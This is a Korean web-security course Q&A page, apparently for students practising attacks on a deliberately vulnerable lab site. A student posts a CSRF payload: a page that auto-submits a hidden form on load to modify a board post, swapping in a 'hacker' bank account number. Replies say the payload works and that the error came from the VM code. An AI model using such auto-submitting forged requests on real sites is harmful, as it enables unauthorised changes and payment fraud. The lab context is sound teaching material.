무단 수정에서
<body onload="document.forms[0].submit()">
<form action="http://아이피/insecure_website/action.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="title" value="계좌번호 정보입니다.">
<input type="hidden" name="content" value="* 은행 : 와우 은행
* 예금주 : 해커
* 계좌번호 : 1111-1111-2222">
<input type="hidden" name="password" value="a">
<input type="hidden" name="idx" value="43">
<input type="hidden" name="mode" value="modify">
<input type="submit">
</form>
</body>
했는데 계속 잘못된 요청이라고 뜨는데 혹시 작성이 잘못된 걸까요..?
답변 3
1
해결 하였습니다 저도 vm을 사용해서 똑같이 실습하는데
vm에 있는 코드를 사용자 쪽에 넣어보니깐 다 정상적으로 작동하네요 아마 코드의 문제 였던 것 같습니다.
감사합니다.
1
음...
공격 페이로드 자체는 문제가 없는데,
잘못된 요청이라고 출력되는게 경고창으로 출력이 되나요???
혹시 스크린샷 첨부 가능할까요?
그리고 저 스크립트를 게시하고 읽을 때 스크립트가 동작하는지 확인도 부탁드리겠습니다.
정확한 상황을 몰라서 체크를 해봐야할 듯 하네요.
세션하이제킹에서 태그
1
473
1
pw='[ENC_DATA]'
1
397
1
MAC php.ini 파일 내 magic_quotes_gpc
1
624
1
cmd에 mysql에 접속하는데 apmsetup과 관련된 database가 안나오는데 어떻게 해야 연결이 되나요?
1
545
1
맥 apmsetup 다운로드
1
516
1
dom-based xss 공격실습 관련 오류
1
489
2
iconv 오류
1
441
1
실습페이지가 버프스위트에 잡히지가 않습니다
1
374
1
URL접근제한 미흡 - 관리자 페이지 Burp spider
1
293
1
게시글 수정 및 삭제
1
348
3
오류 질문
1
339
1
인증서 설치하고 다 설정 제대로 되있는데 무한정 대기걸립니다.
1
390
1
E드라이브의 www폴더와 192.168.0.200 ip상관관계
1
371
1
캐시 단계 동일한 쿼리 들어올 경우
1
275
1
C:\APM_Setup\htdocs\insecure_website_20200729\index.php on line 19 오류
1
254
2
에러 질문이요
1
307
1
화면에 이거만 나오네요 왜이러죠???
1
342
1
os command injection
1
396
1
질문입니다.
1
201
1
강의자료는 어디서 보나요?
1
232
1
질문입니닷
1
221
1
질문입니닷
1
212
2
8분 48초 그림에서
1
199
1
URL 접근구너한 제한 취약점 관련 문의
1
345
1